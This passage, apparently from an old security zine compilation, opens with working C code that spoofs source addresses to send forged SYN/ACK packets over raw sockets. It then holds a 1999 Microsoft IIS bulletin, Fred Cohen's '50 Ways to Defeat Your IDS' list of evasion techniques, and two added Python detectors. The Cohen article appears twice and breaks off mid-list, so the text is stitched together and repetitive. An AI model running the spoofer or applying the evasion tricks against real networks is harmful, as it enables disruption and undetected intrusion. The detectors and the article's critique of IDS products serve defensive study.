sizeof(struct tcphdr));
bcopy(tcp,pseudo,sizeof(struct tcphdr));
foo.sin_family=AF_INET;
foo.sin_addr.s_addr=dstaddr;
sendto(s,packet,sizeof(struct ip) +
sizeof(struct tcphdr) + length, 0,
(struct sockaddr *) &foo,sizeof(foo));
return 0;
}
void usage(char *name) {
fprintf(stderr,"\x1B[0;34mP.A.T.C.H. production - misteri0\x1B[0;0m\n");
fprintf(stderr,"\x1B[1;36mUsage: \x1B[0;31m%s \x1B[1;32m[\x1B[0;36msrcip\x1B[1;32m] \x1B[1;32m[\x1B[0;36msrc start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdstip\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdst start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mcount\x1B[1;32m]\x1B[0;0m\n",name);
fprintf(stderr,"\x1B[0;35mNote: \x1B[0;33mThe source/destination ports will increment by 1\x1B[0;0m\n");
exit(1);
}
u_long resolve_name(char *hostname) {
struct hostent *host;
u_long addr;
if ((addr = inet_addr(hostname)) != -1) return addr;
if ((host = gethostbyname(hostname)) == NULL) {
fprintf(stderr,"Can not resolve name: %s\n",hostname);
exit(1);
}
bcopy(host->h_addr,&addr,host->h_length);
return addr;
}
int main(argc,argv)
int argc;
char **argv;
{
int rawfd,rd,rsize;
int count; /* don't know why I made it so complicated, *sigh* oh well, gets the job done.. */
int one=1;
u_char buf[1024];
struct sockaddr_in raddr;
struct ifreq ifr;
struct in_addr srcip,dstip;
u_short srcport,dstport;
if (argc!=6) usage(argv[0]);
srcip.s_addr = resolve_name(argv[1]);
srcport = atoi(argv[2]);
dstip.s_addr = resolve_name(argv[3]);
dstport = atoi(argv[4]);
if ((rawfd=socket(PF_INET,SOCK_RAW,IPPROTO_ICMP))<0) {
perror("RawSocket:");
exit(1);
}
if (setsockopt(rawfd,IPPROTO_IP,IP_HDRINCL,&one,sizeof(one))<0) {
perror("SetSockOpt:");
close(rawfd);
exit(1);
}
count=0;
while(atoi(argv[5]) > count)
{
count++;
printf("sending packet from: %s:%i ",inet_ntoa(srcip),srcport);
printf("to %s:%i\n",inet_ntoa(dstip),dstport);
/* think about it, =-) */
srcport = srcport + 1;
dstport = dstport + 1;
sendpack(rawfd,srcip.s_addr,srcport,dstip.s_addr,dstport,TH_SYN,NULL,0);
sendpack(rawfd,srcip.s_addr,srcport,dstip.s_addr,dstport,TH_ACK,NULL,0);
usleep(1000);
}
/* printf("starting..");
for(;;) {
printf("foo..");
fflush(stdout);
if ((rd=recvfrom(rawfd,buf,1024,0,(struct sockaddr *)&raddr,&rsize))<0) break;
printf("%i\n",rd);
}*/
close(rawfd);
return(0);
}
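On the defender's side, the header comment above describes a traffic shape that is easy to pick out of a packet capture: from one (spoofed) source, a SYN followed by an ACK on the same port pair, then both the source and destination port stepping up by exactly one. Here is a detector for that walk, an added example of mine that is not part of the tool or the zine; it parses constructed lines in tcpdump's summary style, and the addresses, ports and the `find_port_walks` threshold are assumptions.

```python
import re
from typing import Dict, List, Tuple

# tcpdump-style summary: "IP src.sport > dst.dport: Flags [S]"
LINE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([A-Z.]+)\]")


def constructed_log() -> List[str]:
    """Constructed capture: six steps of the SYN/ACK port walk with an
    ordinary client's connections (same server port each time) mixed in."""
    lines = []
    for i in range(6):
        sp, dp = 1001 + i, 2001 + i
        lines.append(f"IP 10.1.1.5.{sp} > 10.2.2.9.{dp}: Flags [S]")
        lines.append(f"IP 10.1.1.5.{sp} > 10.2.2.9.{dp}: Flags [.]")
        lines.append(f"IP 192.168.0.7.{43210 + i} > 10.2.2.9.80: Flags [S]")
    return lines


def parse(lines: List[str]) -> List[Tuple[str, int, str, int, str]]:
    recs = []
    for ln in lines:
        m = LINE.search(ln)
        if m:
            recs.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4)), m.group(5)))
    return recs


def find_port_walks(records, min_pairs: int = 4) -> List[Dict]:
    """A walk is a run of port pairs, per (src, dst), where both ports advance
    by exactly 1.  Repeats of the same pair (the SYN/ACK twin) extend the
    run's flag set instead of breaking it."""
    runs: Dict[Tuple[str, str], Dict] = {}
    found: List[Dict] = []

    def flush(key: Tuple[str, str]) -> None:
        r = runs.pop(key, None)
        if r and r["pairs"] >= min_pairs:
            found.append({"src": key[0], "dst": key[1], "first_ports": r["start"],
                          "pairs": r["pairs"], "flags": sorted(r["flags"])})

    for src, sp, dst, dp, fl in records:
        key, pair = (src, dst), (sp, dp)
        r = runs.get(key)
        if r and pair == r["last"]:
            r["flags"].add(fl)
        elif r and pair == (r["last"][0] + 1, r["last"][1] + 1):
            r["last"] = pair
            r["pairs"] += 1
            r["flags"].add(fl)
        else:
            flush(key)                         # run broken: report it if long enough
            runs[key] = {"start": pair, "last": pair, "pairs": 1, "flags": {fl}}
    for key in list(runs):
        flush(key)
    return found
```

A real client walking its ephemeral port upwards keeps the server port fixed, so it never satisfies the "both ports +1" rule; the spoofed source address is of course not a reliable key on its own, which is why the rule keys on the (src, dst) pair and the stepping ports together.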
103.0 Double-byte code vulnerability, MS Security Bulletin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 25 Jun 1999 10:18:46 -0700
From: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@netspace.org
Subject: Microsoft Security Bulletin (MS99-022)
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-022)
--------------------------------------
Patch Available for "Double Byte Code Page" Vulnerability
Originally Posted: June 24, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability in
Microsoft(r) Internet Information Server that could allow a web site
visitor to view the source code for selected files on the server, if the
server's default language is set to Chinese, Japanese or Korean.
Frequently asked questions regarding this vulnerability can be found
at http://www.microsoft.com/security/bulletins/MS99-022faq.asp
Issue
=====
When IIS is run on a machine on which a double-byte character set code page
is used (i.e., the default language on the server is set to Chinese,
Japanese, or Korean), and a specific URL construction is used to request a
file in a virtual directory, normal server-side processing is bypassed. As
a result, the file is simply delivered as text to the browser, thereby
allowing the source code to be viewed.
Affected Software Versions
==========================
- Microsoft Internet Information Server 3.0 and 4.0, if run on a server
whose default language is set to Chinese, Korean, or Japanese
Patch Availability
==================
- English: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/usa/security/fesrc-fix
- Simplified Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/chs/security/fesrc-fix
- Traditional Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/cht/security/fesrc-fix
- Japanese: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/jpn/security/fesrc-fix
- Korean: ftp://ftp.microsoft.com/bussys/iis/iis-public/
fixes/kor/security/fesrc-fix
NOTE: Line breaks have been inserted into the above URLs for readability
NOTE: Apply the patch corresponding to the language version of IIS, rather
than the current default language on the server. For example, if you have
the English version of IIS but have reset the default language on the
server to Chinese, apply the English patch.
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-022: Frequently Asked Questions,
http://www.microsoft.com/security/bulletins/MS99-022faq.asp.
- Microsoft Knowledge Base (KB) article Q233335,
"Page Contents Visible When Certain Characters are at End of URL",
http://support.microsoft.com/support/kb/articles/q233/3/35.asp.
(Note: It may take 24 hours from the original posting of this bulletin
for the KB article to be visible; however, a copy will be immediately
available in the patch folder)
- Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp.
- IIS Security Checklist,
http://www.microsoft.com/security/products/iis/CheckList.asp.
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- June 24, 1999: Bulletin Created.
-------------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
--------------------------------------------------------------------------------
Date: Fri, 25 Jun 1999 17:33:22 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Microsoft Security Bulletin (MS99-022) - Double Byte Code Page Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Ok, Microsoft released this one yesterday and I needed to get a little
clarification before I sent it on to you.
Basically, we have an unknown vulnerability against IIS on NT boxes
that have chosen an "Input Locale" of Chinese, Korean, or Japanese.
These languages all use a double-byte code page set to represent the
language characters. A "munged" URL can fool such an IIS server into
providing the source for the page instead of the display (similar to
the way ::$DATA worked).
So, if you're like me, you're wondering a couple of things;
Q: How do I know I might be affected by this?
A: If you got a version of NT for any language other than Chinese,
Korean, or Japanese, then you would have had to install the "Far
East Language Pack" to make these languages available on your machine.
Then, assuming you did install this pack, you would have to have gone
into Control Panel/Regional Settings/Input Locale, and actually chosen
one of them as your default language. If you haven't done this, be not
afraid.
The other way is if you got a Chinese, Korean, or Japanese version of
NT and have left the Input Locale to that language (or have chosen one
of the other languages). If, however, you have chosen, e.g., EN
(English), then you're not susceptible.
Confused yet?
Of course it also goes without saying that you have to be running IIS
on this box too.
Q: What is the attack?
A: Wouldn't we all like to know. This one is internally discovered by
MS, so we don't have any details of what exactly is the vulnerability
(other than knowing you're subject to the vulnerability using the
products described above).
Good show for MS telling us about the patch, we'll see if they can
come clean on some level of detail of the actual exploit...would
really show how much the MS Security approach has changed, wouldn't
it...;-]
MS99-022 FAQ
http://www.microsoft.com/security/bulletins/MS99-022faq.asp
Patches at
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
English: usa/security/fesrc-fix
Simplified Chinese: chs/security/fesrc-fix
Traditional Chinese: cht/security/fesrc-fix
Japanese: jpn/security/fesrc-fix
Korean: kor/security/fesrc-fix
Sorry for the delay in bringing you this rather sparse amount of
additional info.
Cheers,
Russ - NTBugtraq Editor
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2
iQA/AwUBN3P1o8+Ua7J6A+woEQIb/wCgkaPzuN3yAPxsbdSSYAatsZkGgiUAoI+O
eDCaxqG/VC+pDg1q0mdLwTLN
=F7rQ
-----END PGP SIGNATURE-----
104.0 50 Ways to defeat your IDS
~~~~~~~~~~~~~~~~~~~~~~~~~~
By Fred Cohen
Managing Network Security
50 Ways to Defeat Your Intrusion Detection System
by
Fred Cohen of Fred Cohen & Associates (fc@all.net) http://all.net/
Series Introduction
Over the last several years, computing has changed to an almost purely networked environment, but the technical aspects of
information protection have not kept up. As a result, the success of information security programs has increasingly become a
function of our ability to make prudent management decisions about organizational activities. Managing Network Security takes a
management view of protection and seeks to reconcile the need for security with the limitations of technology.
Background and Introduction:
This article is based on a short piece I wrote a few weeks ago on an airplane on the way back from the National Computer
Security Center / National Institute of Science and Technology conference.
I was one of 12 speakers on a panel discussion about how to protect networks when the style of computing involves loading
untrusted executable programs from over the Internet into network browsers running on computers inside the firewall. At some
point during that panel discussion I stated that, while the idea of intrusion detection systems was an interesting one and one that
should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth
the effort to implement them. (My actual words were a bit less polite, but you get the idea).
After the panel, I had to go to the airport straight away to make my plane. When I sat down, I was surprised to find both the
editor (Richard Power) and director (Patrice Rapaulus) of the Computer Security Institute sitting in the next row taking the same
set of flights back to San Francisco. As we discussed the conference and I mentioned the limited abilities of intrusion detection
systems, Richard joked that I could write an article on the 50 ways to bypass intrusion detection systems. I had written the 50
Ways to Attack Your World Wide Web Systems a few years earlier just before their fall conference. I know Richard was
surprised when I asked him when he needed it.
The deadline was in a few days and, since the plane ride was several hours long and I had my pocket computer in my pocket, I
told him I’d have it for him before the first stop. (Dallas - Fort Worth) I started typing and every few attacks read them a sample,
they laughed at the funnier ones, and it made the plane ride a bit more pleasant for an hour or so. When I finished the 50 ways
(plus a few bonus ways) I read the whole piece to them, they laughed at the funnier parts, and Richard had it in his email before he
got home.
Here then is the piece, more or less as it was when I Emailed it to them, complete with the original introduction. It was my hope
then as it is my hope now that you will both enjoy the humor in these weaknesses and appreciate the seriousness underlying them
at the same time.
Original Introduction:
In my ongoing attempt to cover the legal bills associated with trying to get Netscape to pay the $50,000 they should owe me for
demonstrating 50 ways to attack World Wide Web systems a few years back, I have been forced to write articles such as this
one for trade rags such as this one. In keeping with this most serious of tones, I introduce here, 50 ways to defeat modern (i.e.,
stone aged) intrusion detection systems.
Background:
From a standpoint of the network security manager, it is often difficult to tell the wheat from the chaff when selecting products or
deciding on capabilities. The current situation in intrusion detection is that very few managers know how to make a proper
decision and vendors seem to be taking advantage of this knowledge vacuum to make sales.
I have heard many claims and a wide range of prices for these systems, but the plain truth is that most current intrusion detection
technologies and systems available to the average buyer are poor at best. This seems to me to be a case where the emperor has
no clothes. Since exposing naked emperors is one of my goals in life, I thought it might be useful to provide decision-makers with
some ammunition to use in evaluating candidate systems. While I hope my playful tone is understood, the issues underlying these
examples are serious and these examples are only the tip of the iceberg.
The 50 Ways:
1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the
string ‘&& true’ into a typical shell command line without ill effect on operation but with degraded IDS performance.
2 - Use tabs instead of spaces in commands. Since most current systems don’t interpret all separators in the same way, changing
to non-standard separators can make them fail. You might also try ‘,’ instead of ‘;’ in the Unix shell.
3 – Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator.
This would confuse detection systems almost without exception.
4 - Reorder a detected attack sequence. For example, if the attack goes ‘a;b;c’ and it would also work as ‘b;a;c’, most detection
systems would rank the one they were not tuned to find as unlikely to be an actual attack.
5 - Split a standard attack across more than one user. Using the ‘a;b;c’ example above, if user X types ‘a;b’ and user Y types ‘c’
the attack is almost certain to go undetected.
6 - Split a standard attack across multiple sessions. Login once and type ‘a;b’, logout, then login and type ‘c’.
7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’
from site X.
8 - Define a macro for a command used in a standard attack. For example, set a shell variable called ‘$ZZ’ to ‘cp’ and then use
‘$ZZ’ instead of ‘cp’ where appropriate.
9 - Define a macro for a parameter in a standard attack. For example, use the name ‘$P’ instead of the string ‘/etc/passwd’.
10 – Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use
for the scripts to the commands and will miss the whole attack.
Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.
11 - Use different commands to do the same function. For example, ‘echo *’ is almost the same as ‘ls’ in the Unix shell.
12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named ‘xxx’, try using ‘yyy’.
13 - Create a code-book translator for attack keywords. This can be done by piping all commands through a filter program –
perhaps using ‘sed’ to do string substitution.
14 - Encode the attacks in ‘ebcdic’ and change terminal types to an ‘ebcdic’ terminal. Since all the characters are differently
coded, the detector will be unable to decode your actions.
15 – Encrypt your attacks – for example, by using the secure shell facilities intended to increase protection by preventing snooping
– including snooping by the IDS.
16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand
the syntax.
17 - Turn on full duplex communications mode with the target. The extra characters going back and forth may confuse the IDS.
18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of
the attacks.
19 - Encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead
of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ‘:’s to
‘-’s.
20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS.
Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls.
So you might send ’15 *.com’ and the victim system might do ‘dir *.com’.
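Items 1, 2, 8, 9, 10 and the first bonus attack all exploit one weakness: a signature that matches the literal bytes of a command. The added example below (my own, not from the article) shows a substring matcher missing those variants and a tokenising normaliser catching them by splitting on every shell separator, collapsing tabs and spaces, dropping comments and `true` filler, and expanding shell variables assigned earlier in the same session. The signature, the session texts and the function names are constructed for illustration, and the normaliser deliberately handles only what a single session's text contains.

```python
import re
import shlex
from typing import Dict, List

# Signature: every token must appear in one command after normalisation.
SIGNATURES = {"read /etc/passwd": ("cat", "/etc/passwd")}

SEPARATORS = re.compile(r"\n|;|&&|\|\||\|")      # items 1 and 2: separators vary
VARIABLE = re.compile(r"\$\{?([A-Za-z_]\w*)\}?")  # items 8 and 9: $ZZ and $P macros


def naive_hits(session: str) -> List[str]:
    """The literal-string matcher the article's tricks are aimed at."""
    return [name for name, toks in SIGNATURES.items() if " ".join(toks) in session]


def normalize(session: str) -> List[List[str]]:
    """Turn a session transcript into a list of token lists, one per command."""
    env: Dict[str, str] = {}
    commands: List[List[str]] = []
    for chunk in SEPARATORS.split(session):
        chunk = chunk.split("#", 1)[0]                 # bonus attack: comments
        try:
            toks = shlex.split(chunk)                  # tabs and space runs collapse
        except ValueError:
            toks = chunk.split()                       # unbalanced quotes: best effort
        if not toks:
            continue
        assign = re.fullmatch(r"([A-Za-z_]\w*)=(.*)", toks[0])
        if assign and len(toks) == 1:
            env[assign.group(1)] = assign.group(2)     # remember the macro
            continue
        toks = [VARIABLE.sub(lambda m: env.get(m.group(1), m.group(0)), t) for t in toks]
        if toks[0] in ("true", ":"):
            continue                                   # item 1: '&& true' filler
        commands.append(toks)
    return commands


def normalized_hits(session: str) -> List[str]:
    cmds = normalize(session)
    return [name for name, toks in SIGNATURES.items()
            if any(all(t in cmd for t in toks) for cmd in cmds)]
```

What the normaliser cannot recover is just as instructive: items 5 to 7 spread the tokens across users, sessions or hosts, so no single transcript contains them, and items 14 and 15 (EBCDIC, encryption) deny the sensor the plaintext altogether; those need correlation across sessions and visibility at the endpoint rather than a better parser.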
21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port
unable to receive further sensor inputs.
22 - Crash the IDS with ping packets. By sending long IPNG packets, many systems that run IDS systems can be crashed,
causing them to fail to detect subsequent attacks.
23 – Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the
platform is taken over, the IDS can be subverted.
24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might
indicate an attack and containing information makes the attack actions look harmless.
25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with
innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected.
26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the
system running the IDS may not be able to create the process needed to generate an audit record.
27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks
from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all
traffic from that host, after which it can be attacked at will.
28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you.
29 - Type everything in infix notation and have it translated via ‘awk’ into prefix notation. The IDS may be unable to interpret the
traffic.
30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the ‘cmd’ buffer instead of typing. The IDS will see things
like control-W and control-Y while the command interpreter on the victim site will see malicious commands.
Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your
traffic may be lost in the glut of other things the IDS has to watch.
31 - Change routes to target to avoid the IDS.
32 - Change return routes from target to avoid the IDS.
33 – Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS.
34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will
miss these packets.
35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this
is often possible by modifying router traffic (as a simple example).
36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won’t be able to
trace it to you (unless they are very good at traces).
37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.
38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encodings
for examples).
39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content.
40 - Use a different tunneled protocol session for the attack – such as IP over HTML.
Bonus Attack - Define your own protocol for a new application and attack over it.
41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity.
42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and
people tend to fail under these circumstances.
43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can’t decode the
attack inside the macro.
44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or … you get the idea.
45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you.
46 - Use a rarely used protocol for the attack. Chances are the IDS doesn’t know how to interpret the packets.
47 - Recode the attack in a different language than it was originally published in.
48 – Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn’t
detect many of the common attacks used by attackers today.
49 - Attack any system that doesn't run Unix. Since almost all of today’s IDS systems only look for Unix attacks, everything else
will pass undetected. (Some apparently detect NT attacks now as well.)
50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks
I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but
the newest numbers I heard for known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress over 50!
Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of
known attacks.
Afterward:
This ends the original article sent to the Computer Security Institute, but it doesn’t even start to end the story of what happened
later. It ended up that the URL for this article was sent to a mailing list for principal investigators funded in the intrusion detection
research area. It seems that some of them have not yet mastered the art of laughing at themselves and were more than a bit upset
at my statements. Others were quite whimsical, and still others took a serious tone but were not offended by the content.
What was strange to me was that I led a serious study of intrusion detection systems less than a year earlier and had the results
reviewed by these same folks. Almost none of them had more than a passing comment on the technical paper that indicated all of
the weaknesses described in this article and a large class of other ones. While I rarely do such a thing, I will quote here from a
private email I sent to one of these folks:
Pretty strange to watch all this commentary in the research community over a paper intended as a humorous poke at
vendors trying to sell poor quality solutions to unsuspecting computer security managers at companies. The serious
paper is the national infosec technical baseline, but it apparently engendered no such discussion.
When will I learn that people ignore my serious work and pay lots of attention to my play pieces.
Summary and Conclusions:
I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I
could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went
back and recounted, and I am pretty sure I have exceeded my goal of 50 ways.
If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion,
laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I
hadn’t told all those decision makers how to ask the tough questions about your product.
The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are
simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by
the acquisition, configuration, or operation costs.
I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays.
About The Author:
Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and
Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be
reached by sending email to fc@all.net.
Managing Network Security
50 Ways to Defeat
Your Intrusion Detection System
by
Fred Cohen of Fred Cohen & Associates (fc@all.net) http://all.net/
Series Introduction
Over the last several years, computing has changed to an almost purely networked environment, but the technical aspects of
information protection have not kept up. As a result, the success of information security programs has increasingly become a
function of our ability to make prudent management decisions about organizational activities. Managing Network Security takes a
management view of protection and seeks to reconcile the need for security with the limitations of technology.
Background and Introduction:
This article is based on a short piece I wrote a few weeks ago on an airplane on the way back from the National Computer
Security Center / National Institute of Standards and Technology conference.
I was one of 12 speakers on a panel discussion about how to protect networks when the style of computing involves loading
untrusted executable programs from over the Internet into network browsers running on computers inside the firewall. At some
point during that panel discussion I stated that, while the idea of intrusion detection systems was an interesting one and one that
should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth
the effort to implement them. (My actual words were a bit less polite, but you get the idea).
After the panel, I had to go to the airport straight away to make my plane. When I sat down, I was surprised to find both the
editor (Richard Power) and director (Patrice Rapaulus) of the Computer Security Institute sitting in the next row taking the same
set of flights back to San Francisco. As we discussed the conference and I mentioned the limited abilities of intrusion detection
systems, Richard joked that I could write an article on the 50 ways to bypass intrusion detection systems. I had written the 50
Ways to Attack Your World Wide Web Systems a few years earlier just before their fall conference. I know Richard was
surprised when I asked him when he needed it.
The deadline was in a few days and, since the plane ride was several hours long and I had my pocket computer in my pocket, I
told him I’d have it for him before the first stop. (Dallas - Fort Worth) I started typing and every few attacks read them a sample,
they laughed at the funnier ones, and it made the plane ride a bit more pleasant for an hour or so. When I finished the 50 ways
(plus a few bonus ways) I read the whole piece to them, they laughed at the funnier parts, and Richard had it in his email before he
got home.
Here then is the piece, more or less as it was when I Emailed it to them, complete with the original introduction. It was my hope
then as it is my hope now that you will both enjoy the humor in these weaknesses and appreciate the seriousness underlying them
at the same time.
Original Introduction:
In my ongoing attempt to cover the legal bills associated with trying to get Netscape to pay the $50,000 they should owe me for
demonstrating 50 ways to attack World Wide Web systems a few years back, I have been forced to write articles such as this
one for trade rags such as this one. In keeping with this most serious of tones, I introduce here, 50 ways to defeat modern (i.e.,
stone aged) intrusion detection systems.
Background:
From the standpoint of the network security manager, it is often difficult to tell the wheat from the chaff when selecting products or
deciding on capabilities. The current situation in intrusion detection is that very few managers know how to make a proper
decision and vendors seem to be taking advantage of this knowledge vacuum to make sales.
I have heard many claims and a wide range of prices for these systems, but the plain truth is that most current intrusion detection
technologies and systems available to the average buyer are poor at best. This seems to me to be a case where the emperor has
no clothes. Since exposing naked emperors is one of my goals in life, I thought it might be useful to provide decision-makers with
some ammunition to use in evaluating candidate systems. While I hope my playful tone is understood, the issues underlying these
examples are serious and these examples are only the tip of the iceberg.
The 50 Ways:
1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the
string ‘&& true’ into a typical shell command line without ill effect on operation but with degraded IDS performance.
2 - Use tabs instead of spaces in commands. Since most current systems don’t interpret all separators in the same way, changing
to non-standard separators can make them fail. You might also try ‘,’ instead of ‘;’ in the Unix shell.
3 – Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator.
This would confuse detection systems almost without exception.
4 - Reorder a detected attack sequence. For example, if the attack goes ‘a;b;c’ and it would also work as ‘b;a;c’, most detection
systems would rank the one they were not tuned to find as unlikely to be an actual attack.
5 - Split a standard attack across more than one user. Using the ‘a;b;c’ example above, if user X types ‘a;b’ and user Y types ‘c’
the attack is almost certain to go undetected.
6 - Split a standard attack across multiple sessions. Login once and type ‘a;b’, logout, then login and type ‘c’.
7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’
from site X.
8 - Define a macro for a command used in a standard attack. For example, set a shell variable called ‘$ZZ’ to ‘cp’ and then use
‘$ZZ’ instead of ‘cp’ where appropriate.
9 - Define a macro for a parameter in a standard attack. For example, use the name ‘$P’ instead of the string ‘/etc/passwd’.
10 – Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use
for the scripts to the commands and will miss the whole attack.
Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.
11 - Use different commands to do the same function. For example, ‘echo *’ is almost the same as ‘ls’ in the Unix shell.
12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named ‘xxx’, try using ‘yyy’.
13 - Create a code-book translator for attack keywords. This can be done by piping all commands through a filter program –
perhaps using ‘sed’ to do string substitution.
14 - Encode the attacks in ‘ebcdic’ and change terminal types to an ‘ebcdic’ terminal. Since all the characters are differently
coded, the detector will be unable to decode your actions.
15 – Encrypt your attacks – for example, by using the secure shell facilities intended to increase protection by preventing snooping
– including snooping by the IDS.
16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand
the syntax.
17 - Turn on full duplex communications mode with the target. The extra characters going back and forth may confuse the IDS.
18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of
the attacks.
19 - Encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead
of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ‘:’s to
‘-‘s.
20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS.
Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls.
So you might send ’15 *.com’ and the victim system might do ‘dir *.com’.
21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port
unable to receive further sensor inputs.
22 - Crash the IDS with ping packets. By sending long PING packets, many systems that run IDS systems can be crashed,
causing them to fail to detect subsequent attacks.
23 – Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the
